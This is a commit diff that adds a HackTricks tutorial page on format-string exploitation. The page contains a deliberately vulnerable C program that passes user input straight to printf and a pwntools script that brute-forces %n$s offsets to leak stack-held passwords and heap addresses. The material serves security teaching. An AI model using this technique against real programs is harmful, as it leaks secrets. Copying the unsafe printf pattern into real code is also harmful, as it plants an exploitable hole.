GITBOOK-4315: No subject

2024-11-21 20:23:18 +00:00 · 2024-04-18 17:49:44 +00:00 · 2024-04-18 17:49:44 +00:00 · fb82ef7e95
commit fb82ef7e95
parent b6cfe83fdd
12 changed files with 107 additions and 0 deletions
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/.gitbook/assets/image
+++ b/.gitbook/assets/image
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -715,6 +715,7 @@
 * [Array Indexing](binary-exploitation/array-indexing.md)
 * [Integer Overflow](binary-exploitation/integer-overflow.md)
 * [Format Strings](binary-exploitation/format-strings/README.md)
+  * [Format Strings - Arbitrary Read Example](binary-exploitation/format-strings/format-strings-arbitrary-read-example.md)
  * [Format Strings Template](binary-exploitation/format-strings/format-strings-template.md)
 * [Heap](binary-exploitation/heap/README.md)
  * [Use After Free](binary-exploitation/heap/use-after-free.md)
--- a/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
+++ b/binary-exploitation/format-strings/format-strings-arbitrary-read-example.md
@ -0,0 +1,106 @@
+# Format Strings - Arbitrary Read Example
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## Code
+
+```c
+#include <stdio.h>
+#include <string.h>
+
+char bss_password[20] = "hardcodedPassBSS"; // Password in BSS
+
+int main() {
+    char stack_password[20] = "secretStackPass"; // Password in stack
+    char input1[20], input2[20];
+
+    printf("Enter first password: ");
+    scanf("%19s", input1);
+    
+    printf("Enter second password: ");
+    scanf("%19s", input2);
+
+    // Vulnerable printf
+    printf(input1);
+    printf("\n");
+    
+    // Check both passwords
+    if (strcmp(input1, stack_password) == 0 && strcmp(input2, bss_password) == 0) {
+        printf("Access Granted.\n");
+    } else {
+        printf("Access Denied.\n");
+    }
+
+    return 0;
+}
+```
+
+Compile it with:
+
+```bash
+clang -o fs-read fs-read.c -Wno-format-security
+```
+
+### Read from stack
+
+The **`stack_password`** will be stored in the stack because it's a local variable, so just abusing printf to show the content of the stack is enough. This is an exploit to BF the first 100 positions to leak the passwords form the stack:
+
+```python
+from pwn import *
+
+for i in range(100):
+    print(f"Try: {i}")
+    payload = f"%{i}$s\na".encode()
+    p = process("./fs-read")
+    p.sendline(payload)
+    output = p.clean()
+    print(output)
+    p.close()
+```
+
+In the image it's possible to see that we can leak the password from the stack in the `10th` position:
+
+<figure><img src="../../.gitbook/assets/image (1231).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1230).png" alt="" width="338"><figcaption></figcaption></figure>
+
+Running the same exploit but with `%p` instead of `%s` it's possible to leak a heap address from the stack at `%5$p`:
+
+<figure><img src="../../.gitbook/assets/image (1232).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1233).png" alt=""><figcaption></figcaption></figure>
+
+<figure><img src="../../.gitbook/assets/image (1234).png" alt=""><figcaption></figcaption></figure>
+
+The difference between the leaked address and the address of the password is:
+
+```
+> print 0xaaaaaaac12b2 - 0xaaaaaaac0048
+$1 = 0x126a
+```
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>